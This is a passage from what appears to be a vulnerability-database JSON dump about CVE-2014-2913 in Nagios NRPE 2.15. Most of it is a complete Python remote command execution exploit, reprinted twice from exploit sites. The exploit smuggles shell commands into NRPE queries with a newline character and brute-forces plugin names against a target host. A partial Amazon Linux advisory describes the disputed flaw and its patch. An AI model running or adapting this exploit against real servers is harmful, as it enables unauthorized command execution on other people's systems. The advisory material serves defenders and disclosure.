self.nCRC32\r\n self.nCRC32 = 0\r\n self.calculate_crc32()\r\n if nRvalCRC != self.nCRC32:\r\n raise ValueError(\"CHECK_NRPE: Response packet had invalid CRC32.\")\r\n\r\n # check packet version\r\n if self.nPacketVersion != NRPE_PACKET_VERSION_2:\r\n raise ValueError(\"CHECK_NRPE: Invalid packet version received from server.\")\r\n\r\n # check packet type\r\n if self.nPacketType != RESPONSE_PACKET:\r\n raise ValueError(\"CHECK_NRPE: Invalid packet type received from server.\")\r\n\r\n # Turn the input data into a proper python string (chop at first NULL)\r\n for ii in range(len(self.sData)):\r\n if self.sData[ii] == \"\\0\":\r\n break\r\n self.sData = self.sData[0:ii]\r\n\r\n\r\nif __name__ == '__main__':\r\n m_oOpts = optparse.OptionParser(\"%prog -H Host_or_IP -c nrpe_command --cmd=\\\"command to execute\\\" [-b, --brute] [-n] [-p PORT] [--timeout sec] [--list]\")\r\n m_oOpts.add_option('--host', '-H', action='store', type='string',\r\n help='The address of the host running the NRPE daemon (required)')\r\n m_oOpts.add_option('--ssl', '-n', action='store_false', default=True,\r\n help='Do no use SSL')\r\n m_oOpts.add_option('--port', '-p', action='store', type='int', default=5666,\r\n help='The port on which the daemon is running (default=5666)')\r\n m_oOpts.add_option('--timeout', '-t', action='store', type='int',\r\n default=10,\r\n help='Number of seconds before connection times out (default=10)')\r\n m_oOpts.add_option('--command', '-c', action='store', type='string',\r\n #default='get_data',\r\n help='The name of nrpe command')\r\n m_oOpts.add_option('--brute', '-b', action='store_true', default=False,\r\n help='Find existing nrpe command from list [ -list ]')\r\n m_oOpts.add_option('--list', action='store_true', default=False,\r\n help='Show NRPE Command list')\r\n m_oOpts.add_option('--cmd', action='store', type='string',\r\n help='Command to execute on the remote server')\r\n\r\n m_oOptions, m_lArgs = m_oOpts.parse_args()\r\n m_nTimeout = m_oOptions.timeout\r\n m_sQuery = m_oOptions.command\r\n m_gList = m_oOptions.list\r\n m_sBrute = m_oOptions.brute\r\n\r\n print (banner)\r\n\r\n if m_gList:\r\n print('[+] NRPE Command list\\n')\r\n for LinesPluginList in PluginList:\r\n print(LinesPluginList)\r\n sys.exit(0)\r\n elif m_sQuery and m_sBrute:\r\n print m_oOpts.format_help()\r\n print('[!]')\r\n print('[!] ERROR: Select only -c OR -b option\\n')\r\n sys.exit(0)\r\n elif not m_oOptions.host or not m_oOptions.cmd:\r\n print m_oOpts.format_help()\r\n sys.exit(0)\r\n\r\n print('[+] Target: '+m_oOptions.host)\r\n print('[+] Command: '+m_oOptions.cmd+' \\n')\r\n\r\n if m_sBrute:\r\n print('[+] Brute force Mode....')\r\n print('[+]')\r\n for LinesPluginList in PluginList:\r\n\r\n m_CommandQuery = \"\"\r\n m_CommandQuery += ' ' + m_oOptions.cmd\r\n if m_lArgs:\r\n m_CommandQuery += ' ' + ' '.join(m_lArgs)\r\n\r\n m_sQuery = LinesPluginList+'!'+str(evilchar)+str(m_CommandQuery)+' #'\r\n\r\n\r\n m_oNRPE = NrpeClient(m_oOptions.host, m_oOptions.port, m_oOptions.ssl,\r\n m_oOptions.timeout)\r\n try:\r\n m_oNRPE.run_query(m_sQuery)\r\n except socket.error:\r\n print('[!] Connection Error!')\r\n sys.exit(1)\r\n except OpenSSL.SSL.ZeroReturnError:\r\n print('[!] Not Vulnerable')\r\n print('[!] Option dont_blame_nrpe disabled or service fixed')\r\n sys.exit(1)\r\n\r\n if m_oNRPE.sData[-11:] == \"not defined\":\r\n print('[-] Checking for NRPE command '+LinesPluginList+':\\t\\t\\tnot found')\r\n else:\r\n print('[+] Checking for NRPE command '+LinesPluginList+':\\t\\t\\tVULNERABLE!')\r\n print('[+]')\r\n print('[+] Max Output CHAR 1024 (According to NRPE <= 2.15 specifications)')\r\n print('[+]')\r\n print('[+] Please ignore NRPE plugin command messages (Usage or Errors)')\r\n print('[+]')\r\n print(m_oNRPE.sData)\r\n sys.exit(0)\r\n elif m_sQuery:\r\n print('[+] Custom command Mode....')\r\n print('[+]')\r\n print('[+] Connecting......')\r\n\r\n m_CommandQuery = \"\"\r\n m_CommandQuery += ' ' + m_oOptions.cmd\r\n if m_lArgs:\r\n m_CommandQuery += ' ' + ' '.join(m_lArgs)\r\n\r\n m_sQuery = m_sQuery+'!'+str(evilchar)+str(m_CommandQuery)+' #'\r\n\r\n m_oNRPE = NrpeClient(m_oOptions.host, m_oOptions.port, m_oOptions.ssl,\r\n m_oOptions.timeout)\r\n try:\r\n m_oNRPE.run_query(m_sQuery)\r\n except KeyboardInterrupt:\r\n print(\"[!] CHECK_NRPE: Socket timeout after %d seconds.\" % m_nTimeout)\r\n sys.exit(1)\r\n except socket.error:\r\n print('[!] Connection Error!')\r\n sys.exit(1)\r\n except OpenSSL.SSL.ZeroReturnError:\r\n print('[!] Not Vulnerable')\r\n print('[!] Option dont_blame_nrpe disabled or service fixed')\r\n sys.exit(1)\r\n\r\n if m_oNRPE.sData[-11:] == \"not defined\":\r\n print('[-] Checking for NRPE command '+m_oOptions.command+': not found...try other NRPE command')\r\n else:\r\n print('[+] Checking for NRPE command '+m_oOptions.command+': VULNERABLE!')\r\n print('[+]')\r\n print('[+] Max Output CHAR 1024 (According to NRPE <= 2.15 specifications)')\r\n print('[+]')\r\n print('[+] Please ignore NRPE plugin command messages (Usage or Errors)')\r\n print('[+]')\r\n print(m_oNRPE.sData)\r\n sys.exit(0)\n\n# 0day.today [2018-03-13] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/22565"}], "seebug": [{"lastseen": "2017-11-19T13:13:33", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-09-04T00:00:00", "published": "2014-09-04T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-87224", "id": "SSV:87224", "type": "seebug", "title": "NRPE 2.15 - Remote Code Execution Vulnerability", "sourceData": "\n #!/usr/bin/python\r\n#\r\n#\r\n# Exploit Title : NRPE &lt;= 2.15 Remote Code Execution Vulnerability\r\n#\r\n# Discovered by : Dawid Golunski\r\n# dawid (at) legalhackers (dot) com\r\n# legalhackers.com\r\n#\r\n# Exploit Author : Claudio Viviani\r\n# http://www.homelab.it\r\n#\r\n# info@homelab.it\r\n# homelabit@protonmail.ch\r\n#\r\n# https://www.facebook.com/homelabit\r\n# https://twitter.com/homelabit\r\n# https://plus.google.com/+HomelabIt1/\r\n# https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww\r\n#\r\n#\r\n#\r\n# C crc32 function ripped from check_nrpe_clone by Alan Brenner &lt;alan.brenner@ithaka.org&gt;\r\n# http://www.abcompcons.com/files/nrpe_client.py\r\n#\r\n# pyOpenSSL Library required (http://pyopenssl.sourceforge.net/)\r\n#\r\n# [root@localhost ~]# pip-python install pyOpenSSL\r\n#\r\n# NRPE &lt;= 2.15 Remote Command Execution Vulnerability\r\n# Release date: 17.04.2014\r\n# Discovered by: Dawid Golunski\r\n# Severity: High\r\n# CVE-2014-2913\r\n#\r\n# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2913\r\n# http://www.exploit-db.com/exploits/32925/\r\n# http://www.homelab.it/index.php/2014/05/03/nagios-nrpe-remote-command-injection-test-fix/ (ITA)\r\n#\r\n# Tested on CentOS 5.x, CentOS 6.x, BacBox 3.x, KaliLinux 1.0.6 with Python 2.x\r\n#\r\n# Demo: https://www.youtube.com/watch?v=nmYiBdnWWcE\r\n#\r\n \r\nimport OpenSSL # non-standard, see http://pyopenssl.sourceforge.net/\r\nimport optparse\r\nimport os\r\nimport signal\r\nimport socket\r\nimport struct\r\nimport sys\r\nimport time\r\n \r\nbanner = &quot;&quot;&quot;\r\n \r\n$$\\ $$\\ $$$$$$$\\ $$$$$$$\\ $$$$$$$$\\ $$$$$$\\ $$\\ $$$$$$$\\\\\r\n$$$\\ $$ |$$ __$$\\ $$ __$$\\ $$ _____| $$ __$$\\ $$$$ | $$ ____|\r\n$$$$\\ $$ |$$ | $$ |$$ | $$ |$$ | \\__/ $$ | \\_$$ | $$ |\r\n$$ $$\\$$ |$$$$$$$ |$$$$$$$ |$$$$$\\ $$$$$$ | $$ | $$$$$$$\\\\\r\n$$ \\$$$$ |$$ __$$&lt; $$ ____/ $$ __| $$ ____/ $$ | \\_____$$\\\\\r\n$$ |\\$$$ |$$ | $$ |$$ | $$ | $$ | $$ | $$\\ $$ |\r\n$$ | \\$$ |$$ | $$ |$$ | $$$$$$$$\\ $$$$$$$$\\ $$\\ $$$$$$\\\\$$$$$$ |\r\n\\__| \\__|\\__| \\__|\\__| \\________| \\________|\\__|\\______|\\______/\r\n \r\n \r\n \r\n $$$$$$$\\ $$$$$$\\ $$$$$$$$\\\\\r\n $$ __$$\\ $$ __$$\\ $$ _____|\r\n $$ | $$ |$$ / \\__|$$ |\r\n $$$$$$$ |$$ | $$$$$\\\\\r\n $$ __$$&lt; $$ | $$ __|\r\n $$ | $$ |$$ | $$\\ $$ |\r\n $$ | $$ |\\$$$$$$ |$$$$$$$$\\\\\r\n \\__| \\__| \\______/ \\________|\r\n NRPE &lt;= 2.15 R3m0t3 C0mm4nd Ex3cut10n\r\n \r\n \r\n =============================================\r\n - Release date: 17.04.2014\r\n - Discovered by: Dawid Golunski\r\n - Severity: High\r\n - CVE: 2014-2913\r\n =============================================\r\n \r\n Written by:\r\n \r\n Claudio Viviani\r\n \r\n http://www.homelab.it\r\n \r\n info@homelab.it\r\n homelabit@protonmail.ch\r\n \r\n https://www.facebook.com/homelabit\r\n https://twitter.com/homelabit\r\n https://plus.google.com/+HomelabIt1/\r\n https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww\r\n \r\n&quot;&quot;&quot;\r\n# Plugin list for Brute force mode\r\nPluginList = ['check_all',\r\n 'check_apt',\r\n 'check_bdii',\r\n 'check_bonding',\r\n 'check_breeze',\r\n 'check_by_ssh',\r\n 'check_check-updates',\r\n 'check_check_sip',\r\n 'check_cluster',\r\n 'check_dhcp',\r\n 'check_dig',\r\n 'check_disk',\r\n 'check_disk_smb',\r\n 'check_dns',\r\n 'check_dpm-disk',\r\n 'check_dpm-head',\r\n 'check_dummy',\r\n 'check_file_age',\r\n 'check_flexlm',\r\n 'check_fping',\r\n 'check_game',\r\n 'check_hpjd',\r\n 'check_http',\r\n 'check_icmp',\r\n 'check_ide_smart',\r\n 'check_ifoperstatus',\r\n 'check_ifstatus',\r\n 'check_ircd',\r\n 'check_lcgdm',\r\n 'check_lcgdm-common',\r\n 'check_ldap',\r\n 'check_lfc',\r\n 'check_linux_raid',\r\n 'check_load',\r\n 'check_log',\r\n 'check_mailq',\r\n 'check_mrtg',\r\n 'check_mrtgtraf',\r\n 'check_mysql',\r\n 'check_nagios',\r\n 'check_nrpe',\r\n 'check_nt',\r\n 'check_ntp',\r\n 'check_nwstat',\r\n 'check_openmanage',\r\n 'check_oracle',\r\n 'check_overcr',\r\n 'check_perl',\r\n 'check_pgsql',\r\n 'check_ping',\r\n 'check_procs',\r\n 'check_radius',\r\n 'check_real',\r\n 'check_rhev',\r\n 'check_rpc',\r\n 'check_sensors',\r\n 'check_smtp',\r\n 'check_snmp',\r\n 'check_ssh',\r\n 'check_swap',\r\n 'check_tcp',\r\n 'check_time',\r\n 'check_ups',\r\n 'check_users',\r\n 'check_wave']\r\n \r\n \r\n \r\n# nrpe 2.15 skip chars &quot;|`&amp;&gt;&lt;'\\&quot;\\\\[]{};&quot; and &quot;$()&quot; but not &quot;\\x0a&quot;(new line)\r\nevilchar = &quot;\\x0a&quot;\r\n \r\nQUERY_PACKET = 1\r\nRESPONSE_PACKET = 2\r\n \r\nNRPE_PACKET_VERSION_2 = 2\r\n \r\n# max amount of data we'll send in one query/response\r\nMAX_PACKETBUFFER_LENGTH = 1024\r\n \r\n \r\n#def debug(sMessage):\r\n# &quot;&quot;&quot;Send a string to STDERR&quot;&quot;&quot;\r\n# if DEBUG:\r\n# sys.stderr.write(&quot;%s\\n&quot; % sMessage)\r\n \r\nclass DataPacket:\r\n &quot;&quot;&quot;A Python implementation of the C struct, packet.&quot;&quot;&quot;\r\n def __init__(self, packet_version, packet_type):\r\n self.nPacketVersion = packet_version # int16\r\n self.nPacketType = packet_type # int16\r\n self.nCRC32 = 0 # u_int32\r\n self.nResultCode = 2324 # int16\r\n self.sData = ''\r\n self.tCRC32 = (\r\n 0x00000000, 0x77073096, 0xee0e612c, 0x990951ba, 0x076dc419,\r\n 0x706af48f, 0xe963a535, 0x9e6495a3, 0x0edb8832, 0x79dcb8a4,\r\n 0xe0d5e91e, 0x97d2d988, 0x09b64c2b, 0x7eb17cbd, 0xe7b82d07,\r\n 0x90bf1d91, 0x1db71064, 0x6ab020f2, 0xf3b97148, 0x84be41de,\r\n 0x1adad47d, 0x6ddde4eb, 0xf4d4b551, 0x83d385c7, 0x136c9856,\r\n 0x646ba8c0, 0xfd62f97a, 0x8a65c9ec, 0x14015c4f, 0x63066cd9,\r\n 0xfa0f3d63, 0x8d080df5, 0x3b6e20c8, 0x4c69105e, 0xd56041e4,\r\n 0xa2677172, 0x3c03e4d1, 0x4b04d447, 0xd20d85fd, 0xa50ab56b,\r\n 0x35b5a8fa, 0x42b2986c, 0xdbbbc9d6, 0xacbcf940, 0x32d86ce3,\r\n 0x45df5c75, 0xdcd60dcf, 0xabd13d59, 0x26d930ac, 0x51de003a,\r\n 0xc8d75180, 0xbfd06116, 0x21b4f4b5, 0x56b3c423, 0xcfba9599,\r\n 0xb8bda50f, 0x2802b89e, 0x5f058808, 0xc60cd9b2, 0xb10be924,\r\n 0x2f6f7c87, 0x58684c11, 0xc1611dab, 0xb6662d3d, 0x76dc4190,\r\n 0x01db7106, 0x98d220bc, 0xefd5102a, 0x71b18589, 0x06b6b51f,\r\n 0x9fbfe4a5, 0xe8b8d433, 0x7807c9a2, 0x0f00f934, 0x9609a88e,\r\n 0xe10e9818, 0x7f6a0dbb, 0x086d3d2d, 0x91646c97, 0xe6635c01,\r\n 0x6b6b51f4, 0x1c6c6162, 0x856530d8, 0xf262004e, 0x6c0695ed,\r\n 0x1b01a57b, 0x8208f4c1, 0xf50fc457, 0x65b0d9c6, 0x12b7e950,\r\n 0x8bbeb8ea, 0xfcb9887c, 0x62dd1ddf, 0x15da2d49, 0x8cd37cf3,\r\n 0xfbd44c65, 0x4db26158, 0x3ab551ce, 0xa3bc0074, 0xd4bb30e2,\r\n 0x4adfa541, 0x3dd895d7, 0xa4d1c46d, 0xd3d6f4fb, 0x4369e96a,\r\n 0x346ed9fc, 0xad678846, 0xda60b8d0, 0x44042d73, 0x33031de5,\r\n 0xaa0a4c5f, 0xdd0d7cc9, 0x5005713c, 0x270241aa, 0xbe0b1010,\r\n 0xc90c2086, 0x5768b525, 0x206f85b3, 0xb966d409, 0xce61e49f,\r\n 0x5edef90e, 0x29d9c998, 0xb0d09822, 0xc7d7a8b4, 0x59b33d17,\r\n 0x2eb40d81, 0xb7bd5c3b, 0xc0ba6cad, 0xedb88320, 0x9abfb3b6,\r\n 0x03b6e20c, 0x74b1d29a, 0xead54739, 0x9dd277af, 0x04db2615,\r\n 0x73dc1683, 0xe3630b12, 0x94643b84, 0x0d6d6a3e, 0x7a6a5aa8,\r\n 0xe40ecf0b, 0x9309ff9d, 0x0a00ae27, 0x7d079eb1, 0xf00f9344,\r\n 0x8708a3d2, 0x1e01f268, 0x6906c2fe, 0xf762575d, 0x806567cb,\r\n 0x196c3671, 0x6e6b06e7, 0xfed41b76, 0x89d32be0, 0x10da7a5a,\r\n 0x67dd4acc, 0xf9b9df6f, 0x8ebeeff9, 0x17b7be43, 0x60b08ed5,\r\n 0xd6d6a3e8, 0xa1d1937e, 0x38d8c2c4, 0x4fdff252, 0xd1bb67f1,\r\n 0xa6bc5767, 0x3fb506dd, 0x48b2364b, 0xd80d2bda, 0xaf0a1b4c,\r\n 0x36034af6, 0x41047a60, 0xdf60efc3, 0xa867df55, 0x316e8eef,\r\n 0x4669be79, 0xcb61b38c, 0xbc66831a, 0x256fd2a0, 0x5268e236,\r\n 0xcc0c7795, 0xbb0b4703, 0x220216b9, 0x5505262f, 0xc5ba3bbe,\r\n 0xb2bd0b28, 0x2bb45a92, 0x5cb36a04, 0xc2d7ffa7, 0xb5d0cf31,\r\n 0x2cd99e8b, 0x5bdeae1d, 0x9b64c2b0, 0xec63f226, 0x756aa39c,\r\n 0x026d930a, 0x9c0906a9, 0xeb0e363f, 0x72076785, 0x05005713,\r\n 0x95bf4a82, 0xe2b87a14, 0x7bb12bae, 0x0cb61b38, 0x92d28e9b,\r\n 0xe5d5be0d, 0x7cdcefb7, 0x0bdbdf21, 0x86d3d2d4, 0xf1d4e242,\r\n 0x68ddb3f8, 0x1fda836e, 0x81be16cd, 0xf6b9265b, 0x6fb077e1,\r\n 0x18b74777, 0x88085ae6, 0xff0f6a70, 0x66063bca, 0x11010b5c,\r\n 0x8f659eff, 0xf862ae69, 0x616bffd3, 0x166ccf45, 0xa00ae278,\r\n 0xd70dd2ee, 0x4e048354, 0x3903b3c2, 0xa7672661, 0xd06016f7,\r\n 0x4969474d, 0x3e6e77db, 0xaed16a4a, 0xd9d65adc, 0x40df0b66,\r\n 0x37d83bf0, 0xa9bcae53, 0xdebb9ec5, 0x47b2cf7f, 0x30b5ffe9,\r\n 0xbdbdf21c, 0xcabac28a, 0x53b39330, 0x24b4a3a6, 0xbad03605,\r\n 0xcdd70693, 0x54de5729, 0x23d967bf, 0xb3667a2e, 0xc4614ab8,\r\n 0x5d681b02, 0x2a6f2b94, 0xb40bbe37, 0xc30c8ea1, 0x5a05df1b,\r\n 0x2d02ef8d)\r\n \r\n def __str__(self):\r\n # Turn whatever string data we have into a null terminated string\r\n if len(self.sData) &lt; MAX_PACKETBUFFER_LENGTH:\r\n sData = self.sData + &quot;\\0&quot; * (MAX_PACKETBUFFER_LENGTH - len(self.sData))\r\n sData += &quot;SR&quot; # not sure about this, from perl\r\n elif len(self.sData) == MAX_PACKETBUFFER_LENGTH + 2:\r\n sData = self.sData\r\n else:\r\n raise ValueError(&quot;CHECK_NRPE: invalid input&quot;)\r\n # Return a string that equals the C struct, not something printable\r\n return struct.pack(&quot;!hhLh&quot; + str(len(sData)) + &quot;s&quot;, self.nPacketVersion,\r\n self.nPacketType, self.nCRC32, self.nResultCode, sData)\r\n \r\n def __len__(self):\r\n return len(self.__str__())\r\n \r\n def dumpself(self):\r\n &quot;&quot;&quot;Debugging output for self as C structure.\r\n \r\n Not normally used.&quot;&quot;&quot;\r\n sElf = self.__str__()\r\n sPrev = sElf[0:1]\r\n nCount = 0\r\n ii = -1\r\n for sChar in sElf[1:]:\r\n ii += 1\r\n if sChar == sPrev:\r\n nCount += 1\r\n continue\r\n if nCount:\r\n print &quot;%d\\t%d *&quot; % (ii - nCount, nCount + 1),\r\n nCount = 0\r\n else:\r\n print &quot;%d\\t&quot; % ii,\r\n print &quot;\\t'%s' (%d)&quot; % (sPrev, ord(sPrev))\r\n sPrev = sChar\r\n print &quot;%d\\t\\t'%s' (%d)&quot; % (ii + 1, sPrev, ord(sPrev))\r\n \r\n def calculate_crc32(self):\r\n &quot;&quot;&quot;Calculate the CRC32 value for the string version of self.&quot;&quot;&quot;\r\n nCRC = 0xFFFFFFFF\r\n for ii in self.__str__():\r\n nIndex = (nCRC ^ ord(ii)) &amp; 0xFF\r\n nCRC = ((nCRC &gt;&gt; 8) &amp; 0x00FFFFFF) ^ self.tCRC32[nIndex]\r\n self.nCRC32 = nCRC ^ 0xFFFFFFFF\r\n #debug(&quot;DataPacket.calculate_crc32 = %d&quot; % self.nCRC32)\r\n \r\n def extract(self, sQuery):\r\n &quot;&quot;&quot;Turn a string into the DataPacket attributes.&quot;&quot;&quot;\r\n #debug(&quot;DataPacket.extract(%d)&quot; % len(sQuery))\r\n tVals = struct.unpack(&quot;!hhLh&quot; + str(len(sQuery) - 10) + &quot;s&quot;, sQuery)\r\n self.nPacketVersion = tVals[0]\r\n self.nPacketType = tVals[1]\r\n self.nCRC32 = tVals[2]\r\n self.nResultCode = tVals[3]\r\n self.sData = tVals[4]\r\n \r\nm_nTimeout = 0\r\ndef alarm_handler(nSignum, oFrame):\r\n &quot;&quot;&quot;Timeout catcher&quot;&quot;&quot;\r\n raise KeyboardInterrupt(&quot;CHECK_NRPE: Socket timeout after %d seconds.&quot; %\r\n m_nTimeout)\r\n \r\n \r\nclass NrpeClient(DataPacket):\r\n &quot;&quot;&quot;Everything needed to send a message to an NRPE server and get data back.\r\n &quot;&quot;&quot;\r\n def __init__(self, server_name, server_port=5666, use_ssl=True, timeout=10,\r\n packet_version=NRPE_PACKET_VERSION_2):\r\n DataPacket.__init__(self, packet_version, QUERY_PACKET)\r\n self.sServer = server_name\r\n self.nPort = server_port\r\n self.bUseSSL = use_ssl\r\n self.nTimeout = timeout\r\n \r\n def run_query(self, sQuery):\r\n &quot;&quot;&quot;Connect to the NRPE server, send the query and get back data.\r\n &quot;&quot;&quot;\r\n # initialize alarm signal handling and set timeout\r\n signal.signal(signal.SIGALRM, alarm_handler)\r\n signal.alarm(self.nTimeout)\r\n \r\n # try to connect to the host at the given port number\r\n oSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n # do SSL handshake\r\n if self.bUseSSL:\r\n oContext = OpenSSL.SSL.Context(OpenSSL.SSL.TLSv1_METHOD)\r\n oContext.set_cipher_list('ADH')\r\n oConnection = OpenSSL.SSL.Connection(oContext, oSocket)\r\n else:\r\n oConnection = oSocket\r\n \r\n oConnection.connect((self.sServer, self.nPort))\r\n \r\n # we're connected and ready to go\r\n self.sData = sQuery\r\n self.nCRC32 = 0\r\n self.calculate_crc32()\r\n \r\n # send the packet\r\n oConnection.send(str(self))\r\n \r\n # wait for the response packet\r\n sRval = oConnection.recv(len(self))\r\n \r\n # close the connection\r\n if self.bUseSSL and not oConnection.shutdown():\r\n try:\r\n sRval += oConnection.recv(len(self))\r\n except OpenSSL.SSL.ZeroReturnError:\r\n pass\r\n oSocket.close()\r\n del oSocket, oConnection\r\n if self.bUseSSL:\r\n del oContext\r\n \r\n # reset timeout\r\n signal.alarm(0)\r\n \r\n if len(sRval) == 0:\r\n raise IOError(&quot;CHECK_NRPE: Received 0 bytes from daemon.&quot; +\r\n &quot;Check the remote server logs for error messages.&quot;)\r\n elif len(sRval) &lt; len(self):\r\n raise IOError(&quot;CHECK_NRPE: Receive underflow - only &quot; +\r\n &quot;%d bytes received (%d expected).&quot; % (len(sRval), len(self)))\r\n \r\n # Become the received data\r\n self.extract(sRval)\r\n \r\n # check the crc 32 value\r\n nRvalCRC = self.nCRC32\r\n self.nCRC32 = 0\r\n self.calculate_crc32()\r\n if nRvalCRC != self.nCRC32:\r\n raise ValueError(&quot;CHECK_NRPE: Response packet had invalid CRC32.&quot;)\r\n \r\n # check packet version\r\n if self.nPacketVersion != NRPE_PACKET_VERSION_2:\r\n raise ValueError(&quot;CHECK_NRPE: Invalid packet version received from server.&quot;)\r\n \r\n # check packet type\r\n if self.nPacketType != RESPONSE_PACKET:\r\n raise ValueError(&quot;CHECK_NRPE: Invalid packet type received from server.&quot;)\r\n \r\n # Turn the input data into a proper python string (chop at first NULL)\r\n for ii in range(len(self.sData)):\r\n if self.sData[ii] == &quot;\\0&quot;:\r\n break\r\n self.sData = self.sData[0:ii]\r\n \r\n \r\nif __name__ == '__main__':\r\n m_oOpts = optparse.OptionParser(&quot;%prog -H Host_or_IP -c nrpe_command --cmd=\\&quot;command to execute\\&quot; [-b, --brute] [-n] [-p PORT] [--timeout sec] [--list]&quot;)\r\n m_oOpts.add_option('--host', '-H', action='store', type='string',\r\n help='The address of the host running the NRPE daemon (required)')\r\n m_oOpts.add_option('--ssl', '-n', action='store_false', default=True,\r\n help='Do no use SSL')\r\n m_oOpts.add_option('--port', '-p', action='store', type='int', default=5666,\r\n help='The port on which the daemon is running (default=5666)')\r\n m_oOpts.add_option('--timeout', '-t', action='store', type='int',\r\n default=10,\r\n help='Number of seconds before connection times out (default=10)')\r\n m_oOpts.add_option('--command', '-c', action='store', type='string',\r\n #default='get_data',\r\n help='The name of nrpe command')\r\n m_oOpts.add_option('--brute', '-b', action='store_true', default=False,\r\n help='Find existing nrpe command from list [ -list ]')\r\n m_oOpts.add_option('--list', action='store_true', default=False,\r\n help='Show NRPE Command list')\r\n m_oOpts.add_option('--cmd', action='store', type='string',\r\n help='Command to execute on the remote server')\r\n \r\n m_oOptions, m_lArgs = m_oOpts.parse_args()\r\n m_nTimeout = m_oOptions.timeout\r\n m_sQuery = m_oOptions.command\r\n m_gList = m_oOptions.list\r\n m_sBrute = m_oOptions.brute\r\n \r\n print (banner)\r\n \r\n if m_gList:\r\n print('[+] NRPE Command list\\n')\r\n for LinesPluginList in PluginList:\r\n print(LinesPluginList)\r\n sys.exit(0)\r\n elif m_sQuery and m_sBrute:\r\n print m_oOpts.format_help()\r\n print('[!]')\r\n print('[!] ERROR: Select only -c OR -b option\\n')\r\n sys.exit(0)\r\n elif not m_oOptions.host or not m_oOptions.cmd:\r\n print m_oOpts.format_help()\r\n sys.exit(0)\r\n \r\n print('[+] Target: '+m_oOptions.host)\r\n print('[+] Command: '+m_oOptions.cmd+' \\n')\r\n \r\n if m_sBrute:\r\n print('[+] Brute force Mode....')\r\n print('[+]')\r\n for LinesPluginList in PluginList:\r\n \r\n m_CommandQuery = &quot;&quot;\r\n m_CommandQuery += ' ' + m_oOptions.cmd\r\n if m_lArgs:\r\n m_CommandQuery += ' ' + ' '.join(m_lArgs)\r\n \r\n m_sQuery = LinesPluginList+'!'+str(evilchar)+str(m_CommandQuery)+' #'\r\n \r\n \r\n m_oNRPE = NrpeClient(m_oOptions.host, m_oOptions.port, m_oOptions.ssl,\r\n m_oOptions.timeout)\r\n try:\r\n m_oNRPE.run_query(m_sQuery)\r\n except socket.error:\r\n print('[!] Connection Error!')\r\n sys.exit(1)\r\n except OpenSSL.SSL.ZeroReturnError:\r\n print('[!] Not Vulnerable')\r\n print('[!] Option dont_blame_nrpe disabled or service fixed')\r\n sys.exit(1)\r\n \r\n if m_oNRPE.sData[-11:] == &quot;not defined&quot;:\r\n print('[-] Checking for NRPE command '+LinesPluginList+':\\t\\t\\tnot found')\r\n else:\r\n print('[+] Checking for NRPE command '+LinesPluginList+':\\t\\t\\tVULNERABLE!')\r\n print('[+]')\r\n print('[+] Max Output CHAR 1024 (According to NRPE &lt;= 2.15 specifications)')\r\n print('[+]')\r\n print('[+] Please ignore NRPE plugin command messages (Usage or Errors)')\r\n print('[+]')\r\n print(m_oNRPE.sData)\r\n sys.exit(0)\r\n elif m_sQuery:\r\n print('[+] Custom command Mode....')\r\n print('[+]')\r\n print('[+] Connecting......')\r\n \r\n m_CommandQuery = &quot;&quot;\r\n m_CommandQuery += ' ' + m_oOptions.cmd\r\n if m_lArgs:\r\n m_CommandQuery += ' ' + ' '.join(m_lArgs)\r\n \r\n m_sQuery = m_sQuery+'!'+str(evilchar)+str(m_CommandQuery)+' #'\r\n \r\n m_oNRPE = NrpeClient(m_oOptions.host, m_oOptions.port, m_oOptions.ssl,\r\n m_oOptions.timeout)\r\n try:\r\n m_oNRPE.run_query(m_sQuery)\r\n except KeyboardInterrupt:\r\n print(&quot;[!] CHECK_NRPE: Socket timeout after %d seconds.&quot; % m_nTimeout)\r\n sys.exit(1)\r\n except socket.error:\r\n print('[!] Connection Error!')\r\n sys.exit(1)\r\n except OpenSSL.SSL.ZeroReturnError:\r\n print('[!] Not Vulnerable')\r\n print('[!] Option dont_blame_nrpe disabled or service fixed')\r\n sys.exit(1)\r\n \r\n if m_oNRPE.sData[-11:] == &quot;not defined&quot;:\r\n print('[-] Checking for NRPE command '+m_oOptions.command+': not found...try other NRPE command')\r\n else:\r\n print('[+] Checking for NRPE command '+m_oOptions.command+': VULNERABLE!')\r\n print('[+]')\r\n print('[+] Max Output CHAR 1024 (According to NRPE &lt;= 2.15 specifications)')\r\n print('[+]')\r\n print('[+] Please ignore NRPE plugin command messages (Usage or Errors)')\r\n print('[+]')\r\n print(m_oNRPE.sData)\r\n sys.exit(0)\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-87224", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "amazon": [{"lastseen": "2018-10-02T16:55:23", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\n** DISPUTED ** Incomplete blacklist vulnerability in nrpe.c in Nagios Remote Plugin Executor (NRPE) 2.15 and earlier allows remote attackers to execute arbitrary commands via a newline character in the -a option to libexec/check_nrpe. NOTE: this issue is disputed by multiple parties. It has been reported that the vendor allows newlines as \"expected behavior.\" Also, this issue can only occur when the administrator enables the \"dont_blame_nrpe\" option in nrpe.conf despite the \"HIGH security risk\" warning within the comments.\n\n \n**Affected Packages:** \n\n\nnrpe\n\n \n**Issue Correction:** \nRun _yum update nrpe_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n nagios-plugins-nrpe-2.15-2.7.amzn1.i686 \n nrpe-debuginfo-2.15-2.7.amzn1.i686 \n nrpe-2.15-2.7.amzn1.i686 \n \n src: \n nrpe-2.15-2.7.amzn1.src \n \n x86_64: \n nrpe-debuginfo-2.15-2.7.amzn1.x86_64 \n nrpe-2.15-2.7.amzn1.x86_64 \n nagios-plugins-nrpe-2.15-2.7.amzn1.x86_64 \n \n \n", "modified": "2014-09-19T10:26:00", "published": "2014-09-19T10:26:00", "id": "ALAS-2014-364", "href": "https://alas.aws.amazon.com/ALAS-2014-364.html", "title": "Important: nrpe", "type": "amazon", "cvss": {"score": 7.5, "vector": 